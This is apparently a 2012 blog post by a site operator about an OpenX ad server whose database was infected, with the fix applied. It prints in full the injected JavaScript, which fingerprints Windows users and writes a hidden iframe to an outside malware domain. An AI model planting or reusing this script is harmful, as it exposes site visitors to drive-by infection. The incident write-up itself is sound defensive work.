14 March 2012

OpenX infection detected by Avast

We use OpenX to deliver ads on one of our sites, and started to get reports that the Avast! antivirus software was tagging our site as infected with js:Iframe-EV [Trj]

There was hardly any information out there about this particular bicho, but it turned out that we were indeed infected. Avast pointed to the file ajs.php, which was the openX script delivering our ads. I didn't start to catch on until I googled ajs.php

The file itself was fine: unchanged from the installed version. The infection had gotten into our server's OpenX database somehow.

Here's the code that was served with each ad:

<script type="text/javascript">window.onload=function(){var aht=new Array();var aht=document.getElementsByTagName('*');for(var i=0;i<aht.length;i++){if(aht[i].name=='append'){aht[i].value='';}if(aht[i].name=='submitbutton'){aht[i].onclick=function(){return false;}}}}</script><noscript><style type="text/css">.code{display:none;}</style></noscript><script> var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://mixdomain.in/stream?1" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}</script>


It was in the 'append' column of several entries in the ox_banners table, and also in the same column in one of the ox_z_xxxxxxxxxx tables.

The fix was this:

  • upgraded OpenX from 2.8.7 to 2.8.8
  • zeroed out the files install.php and install-plugin.php
  • moved the directory plugins to a random new location (I'll delete it altogether if no problem associated with its absence arises)
  • set the column append equal to the empty string in every record of every table in which it appears (ox_banners, ox_zones, and all the ox_z_xxxxxxxxx tables)
  • restarted apache2
However, this infection takes many forms (google "ajs.php malware"), so don't take the above as being literally all you have to do. Check the prepend column too in the same tables. Check that no extra admin users have appeared.

Before I upgraded OpenX, I emptied out the same column, but the infection was back the next day. So there was a back door open somewhere. I hope that upgrading to 2.8.8 will have closed the back door, but it's hard to be sure.

From what I've seen, the route of the infection is by attackers taking advantage of the install.php file or install-plugin.php file to upload a script that they have written which writes into your OpenX database.

I wonder when software developers will stop being so naive -- but perhaps they are only naive in the open source version.

No comments: